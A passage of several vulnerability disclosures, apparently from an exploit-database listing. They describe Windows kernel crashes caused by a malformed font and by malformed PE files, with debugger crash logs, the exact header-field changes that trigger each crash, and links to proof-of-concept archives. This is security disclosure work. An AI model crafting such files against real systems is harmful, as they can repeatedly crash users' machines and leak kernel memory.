pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf", "hmtx" and "prep" tables. The issue reproduces on Windows 7 and Windows Server 2008 R2 (64-bit), with and without Special Pools enabled for win32k.sys. Attached is an archive with the proof-of-concept mutated TTF file, the original font used to generate it and the source code of a simple harness program, which loads the given font and displays all of its glyphs at different point sizes on the screen. Running the harness against the provided font is required to trigger the crash, and it only occurs after a few seconds (while processing the 2nd LOGFONT). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip

We have encountered a Windows kernel crash in nt!MiOffsetToProtos while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x0000003b (0x00000000C0000005,0xFFFFF8006F0860C4,0xFFFFD20AD8E1E290,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. For analysis of this file, run !analyze -v nt!DbgBreakPointWithStatus: fffff800`6f1c46a0 cc int 3 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff8006f0860c4, Address of the instruction which caused the bugcheck Arg3: ffffd20ad8e1e290, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. [...] CONTEXT: ffffd20ad8e1e290 -- (.cxr 0xffffd20ad8e1e290) rax=00000000000000a2 rbx=ffffab829154f420 rcx=0000000000000000 rdx=0000000000000002 rsi=0000000000000000 rdi=ffffab828fb6f690 rip=fffff8006f0860c4 rsp=ffffd20ad8e1ec80 rbp=000000000000000b r8=ffffd20ad8e1ed90 r9=ffffab828fb6f690 r10=ffffab828fb6f690 r11=ffffe601c2e7f7b0 r12=0000000001000000 r13=0000000000000002 r14=000000000000a008 r15=ffffd20ad8e1ed90 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050246 nt!MiOffsetToProtos+0x324: fffff800`6f0860c4 8b562c mov edx,dword ptr [rsi+2Ch] ds:002b:00000000`0000002c=???????? Resetting default scope [...] STACK_TEXT: ffffd20a`d8e1ec80 fffff800`6f62a3f9 : ffffab82`8fb6f6d0 ffffab82`9154f420 00000000`00000048 ffffab82`8fb6f690 : nt!MiOffsetToProtos+0x324 ffffd20a`d8e1ed60 fffff800`6f6d6105 : ffffab82`9154f420 ffffd20a`d8e1efb0 ffffd20a`d8e1ef50 00000000`0000b000 : nt!MiLogRelocationRva+0x29 ffffd20a`d8e1edb0 fffff800`6f5fc56a : ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffd20a`d8e1efb0 ffffd20a`d8e1f180 : nt!MiParseComImage+0xd9 ffffd20a`d8e1eeb0 fffff800`6f5dca20 : ffffab82`9154f420 ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffab82`9154f3f0 : nt!MiCreateNewSection+0x2b6 ffffd20a`d8e1f010 fffff800`6f5dcd24 : ffffd20a`d8e1f040 ffffe601`c3b87f40 ffffab82`9154f420 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffd20a`d8e1f100 fffff800`6f5dc37f : 00000000`11000000 ffffd20a`d8e1f4c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffd20a`d8e1f280 fffff800`6f5dc110 : 00000005`e1478f48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffd20a`d8e1f360 fffff800`6f1ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffd20a`d8e1f3d0 00007ffb`2815c9a4 : 00007ffb`25251ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 00000005`e1478ed8 00007ffb`25251ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 00000005`e1478ee0 00007ffb`25255640 : 0000019b`db947d00 00000024`00000000 00007ffb`26202770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000005`e1479110 00007ffb`2523c41d : 0000019b`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000005`e1479180 00007ffb`272503d1 : 0000019b`db9497c0 00000000`00000000 0000019b`db948c30 00007ffb`27266d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000005`e14791e0 00007ffb`2725035c : 00000000`00000000 00007ffb`257610ff 0000019b`db9497c0 00000005`e1479530 : shell32!_LoadVersionInfo+0x39 00000005`e1479250 00007ffb`257dc1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The direct cause of the crash is an attempt to read from a near-zero address. As the address does not seem to be controlled, and NULL page mappings are prohibited in modern systems (except for when NTVDM is enabled on 32-bit platforms), we classify it as a Denial of Service vulnerability. We have not determined the specific root cause of the issue, but we have found that it is related to the processing of .NET executables. We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file: one which increases the value of the SizeOfImage field from 0xa000 to 0xa100, and one that changes the CLR Runtime Header data directory address from 0x2008 to 0xa008. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47485.zip

We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8007b6e00ac, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffffa8375df1860 -- (.trap 0xfffffa8375df1860) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30 r8=00000000000000c0 r9=fffff8007b6d0080 r10=0000000000000004 r11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz ac po cy CI!CipFixImageType+0x9d: fffff800`79a7e5c1 418b44cb3c mov eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80077ea6642 to fffff80077dc46a0 STACK_TEXT: fffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus fffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12 fffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952 fffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107 fffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171 fffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f fffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360 fffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d fffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279 fffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6 fffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 fffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6 fffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad fffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 fffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 fffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff fffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 fffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39 000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field. We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9). The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip

We have encountered a Windows kernel crash in memcpy() called by nt!MiParseImageLoadConfig while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF805751F5000,0x0000000000000000,0xFFFFF805773CF6E5,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff805751f5000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff805773cf6e5, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffff8380cd506820 -- (.trap 0xffff8380cd506820) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=000000000000005c rbx=0000000000000000 rcx=ffff8380cd506c80 rdx=00007484a7cee364 rsi=0000000000000000 rdi=0000000000000000 rip=fffff805773cf6e5 rsp=ffff8380cd5069b8 rbp=ffff8380cd506fb0 r8=0000000000000008 r9=0000000000000003 r10=000000000000020b r11=ffff8380cd506be0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc nt!memcpy+0xa5: fffff805`773cf6e5 f30f6f4c1110 movdqu xmm1,xmmword ptr [rcx+rdx+10h] ds:fffff805`751f4ff4=???????????????????????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff805774a6642 to fffff805773c46a0 STACK_TEXT: ffff8380`cd505dd8 fffff805`774a6642 : fffff805`751f5000 00000000`00000003 ffff8380`cd505f40 fffff805`77322be0 : nt!DbgBreakPointWithStatus ffff8380`cd505de0 fffff805`774a5d32 : fffff805`00000003 ffff8380`cd505f40 fffff805`773d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffff8380`cd505e40 fffff805`773bca07 : fffff078`3c1e0f80 fffff805`774d0110 00000000`00000000 fffff805`77663900 : nt!KeBugCheck2+0x952 ffff8380`cd506540 fffff805`773e0161 : 00000000`00000050 fffff805`751f5000 00000000`00000000 ffff8380`cd506820 : nt!KeBugCheckEx+0x107 ffff8380`cd506580 fffff805`7727aaef : fffff805`77663900 00000000`00000000 00000000`00000000 fffff805`751f5000 : nt!MiSystemFault+0x1d3171 ffff8380`cd506680 fffff805`773ca920 : ffff8380`cd5068b0 fffff805`773caa4e fffff805`75000000 fffff078`3c1f1000 : nt!MmAccessFault+0x34f ffff8380`cd506820 fffff805`773cf6e5 : fffff805`7788397d ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 : nt!KiPageFault+0x360 ffff8380`cd5069b8 fffff805`7788397d : ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 ffff8d03`15cab288 : nt!memcpy+0xa5 ffff8380`cd5069c0 fffff805`7788238e : fffff805`75000000 ffffaf0f`9d705048 00000000`00000000 00000000`001f5000 : nt!MiParseImageLoadConfig+0x171 ffff8380`cd506d40 fffff805`777fc8a3 : ffff8380`cd507180 ffff8380`cd507180 ffff8380`cd506fb0 ffff8380`cd507180 : nt!MiRelocateImage+0x2fe ffff8380`cd506eb0 fffff805`777dca20 : ffff8d03`1526e520 ffff8380`cd507180 ffff8380`cd507180 ffff8d03`1526e4f0 : nt!MiCreateNewSection+0x5ef ffff8380`cd507010 fffff805`777dcd24 : ffff8380`cd507040 ffffaf0f`9d530760 ffff8d03`1526e520 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffff8380`cd507100 fffff805`777dc37f : 00000000`11000000 ffff8380`cd5074c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffff8380`cd507280 fffff805`777dc110 : 000000c1`e89f8e28 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffff8380`cd507360 fffff805`773ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffff8380`cd5073d0 00007ff8`2fa5c9a4 : 00007ff8`2d7c1ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000c1`e89f8db8 00007ff8`2d7c1ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000c1`e89f8dc0 00007ff8`2d7c5640 : 000001d3`61bac500 0000002e`00000000 00007ff8`2f292770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000c1`e89f8ff0 00007ff8`2d7ac41d : 000001d3`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000c1`e89f9060 00007ff8`2dd503d1 : 000001d3`61bd1d10 00000000`00000000 000001d3`61bb94d0 00007ff8`2dd66d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000c1`e89f90c0 00007ff8`2dd5035c : 00000000`00000000 00007ff8`2ced10ff 000001d3`61bd1d10 000000c1`e89f9410 : shell32!_LoadVersionInfo+0x39 000000c1`e89f9130 00007ff8`2cf4c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c 000000c1`e89f9160 00007ff8`2cee23d4 : 00000000`00000080 00000000`00000000 00000000`80004002 00000000`f20003f1 : windows_storage!InitializeFileHandlerWithFile+0xc9 [...] --- cut --- We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file, which change the Load Configuration Directory address from 0x1e4644 to 0x1f4f44. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip

We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF80068F02000,0x0000000000000000,0xFFFFF80067291A2C,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80067291A2C base at FFFFF80067230000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff80068f02000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80067291a2c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffe20f4b7d6400 -- (.trap 0xffffe20f4b7d6400) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=00000000000000c8 rbx=0000000000000000 rcx=144670b8d60e0000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80067291a2c rsp=ffffe20f4b7d6590 rbp=ffffe20f4b7d6690 r8=00000000fffffe00 r9=fffff80068ef0000 r10=0000000000000002 r11=ffffe20f4b7d6760 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc CI!HashKComputeFirstPageHash+0x1f4: fffff800`67291a2c 418b5dd4 mov ebx,dword ptr [r13-2Ch] ds:ffffffff`ffffffd4=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80065aa6642 to fffff800659c46a0 STACK_TEXT: ffffe20f`4b7d59b8 fffff800`65aa6642 : fffff800`68f02000 00000000`00000003 ffffe20f`4b7d5b20 fffff800`65922be0 : nt!DbgBreakPointWithStatus ffffe20f`4b7d59c0 fffff800`65aa5d32 : fffff800`00000003 ffffe20f`4b7d5b20 fffff800`659d0fb0 ffffe20f`4b7d6060 : nt!KiBugCheckDebugBreak+0x12 ffffe20f`4b7d5a20 fffff800`659bca07 : ffff8bc5`e2f17f80 fffff800`65ad0110 00000000`00000000 fffff800`65c63900 : nt!KeBugCheck2+0x952 ffffe20f`4b7d6120 fffff800`659e0161 : 00000000`00000050 fffff800`68f02000 00000000`00000000 ffffe20f`4b7d6400 : nt!KeBugCheckEx+0x107 ffffe20f`4b7d6160 fffff800`6587aaef : fffffb00`023b21b0 00000000`00000000 00000000`00000000 fffff800`68f02000 : nt!MiSystemFault+0x1d3171 ffffe20f`4b7d6260 fffff800`659ca920 : ffffe20f`4b7d6860 00000000`00000000 00000000`00000200 fffff800`65c651c0 : nt!MmAccessFault+0x34f ffffe20f`4b7d6400 fffff800`67291a2c : 00000000`00000000 ffffe20f`4b7d6690 00000000`00000000 00000000`00001000 : nt!KiPageFault+0x360 ffffe20f`4b7d6590 fffff800`67280829 : 00000000`00000000 ffffce0d`8ae71003 ffffac8f`23a2a9e8 00000000`00000000 : CI!HashKComputeFirstPageHash+0x1f4 ffffe20f`4b7d67c0 fffff800`6727f10d : ffffac8f`23a2a5a0 ffffce0d`8ae71080 ffffce0d`00000000 00000000`00000000 : CI!CipGetEmbeddedSignatureAndFindFirstMatch+0x181 ffffe20f`4b7d6860 fffff800`6727e89a : ffffac8f`23a2a5a0 ffffce0d`8b7e1d50 ffffce0d`8ae71080 fffff800`68ef0000 : CI!CipValidatePageHash+0xfd ffffe20f`4b7d6950 fffff800`6727cc8b : fffff800`6727f010 ffffe20f`4b7d6c8c ffffce0d`8b7e1d50 ffffce0d`8ae71080 : CI!CipValidateImageHash+0xe6 ffffe20f`4b7d6a30 fffff800`65e85766 : ffffe20f`4b7d6c70 fffff800`68ef0000 00000000`0000000e fffff800`68ef0000 : CI!CiValidateImageHeader+0x68b ffffe20f`4b7d6bb0 fffff800`65e8528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00012000 : nt!SeValidateImageHeader+0xd6 ffffe20f`4b7d6c60 fffff800`65e1e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 ffffe20f`4b7d6e50 fffff800`65dfc861 : ffffe20f`4b7d7180 ffffe20f`4b7d6fb0 00000000`40000000 ffffe20f`4b7d7180 : nt!MiValidateSectionSigningPolicy+0xa6 ffffe20f`4b7d6eb0 fffff800`65ddca20 : ffffce0d`8b7e1d50 ffffe20f`4b7d7180 ffffe20f`4b7d7180 ffffce0d`8b7e1d20 : nt!MiCreateNewSection+0x5ad ffffe20f`4b7d7010 fffff800`65ddcd24 : ffffe20f`4b7d7040 ffffac8f`2af6a9f0 ffffce0d`8b7e1d50 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffe20f`4b7d7100 fffff800`65ddc37f : 00000000`11000000 ffffe20f`4b7d74c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffe20f`4b7d7280 fffff800`65ddc110 : 00000010`0e3f8dc8 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffe20f`4b7d7360 fffff800`659ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffe20f`4b7d73d0 00007ffe`c317c9a4 : 00007ffe`c0511ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 00000010`0e3f8d58 00007ffe`c0511ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 00000010`0e3f8d60 00007ffe`c0515640 : 00000129`5f442be0 0000001b`00000000 00007ffe`c1f72770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000010`0e3f8f90 00007ffe`c04fc41d : 00000129`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000010`0e3f9000 00007ffe`c16903d1 : 00000129`5f414f00 00000000`00000000 00000129`5f443840 00007ffe`c16a6d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000010`0e3f9060 00007ffe`c169035c : 00000000`00000000 00007ffe`c08710ff 00000129`5f414f00 00000010`0e3f93b0 : shell32!_LoadVersionInfo+0x39 00000010`0e3f90d0 00007ffe`c08ec1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which decreases NumberOfSections from 4 to 3, one which increases SizeOfOptionalHeader from 0xF0 to 0xCEF0, and one which changes DllCharacteristics from 0 to 0x00FF (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | 0xf). The issue reproduces on Windows 10 and Windows Server 2019 64-bit (Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and one additional non-minimized sample. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip

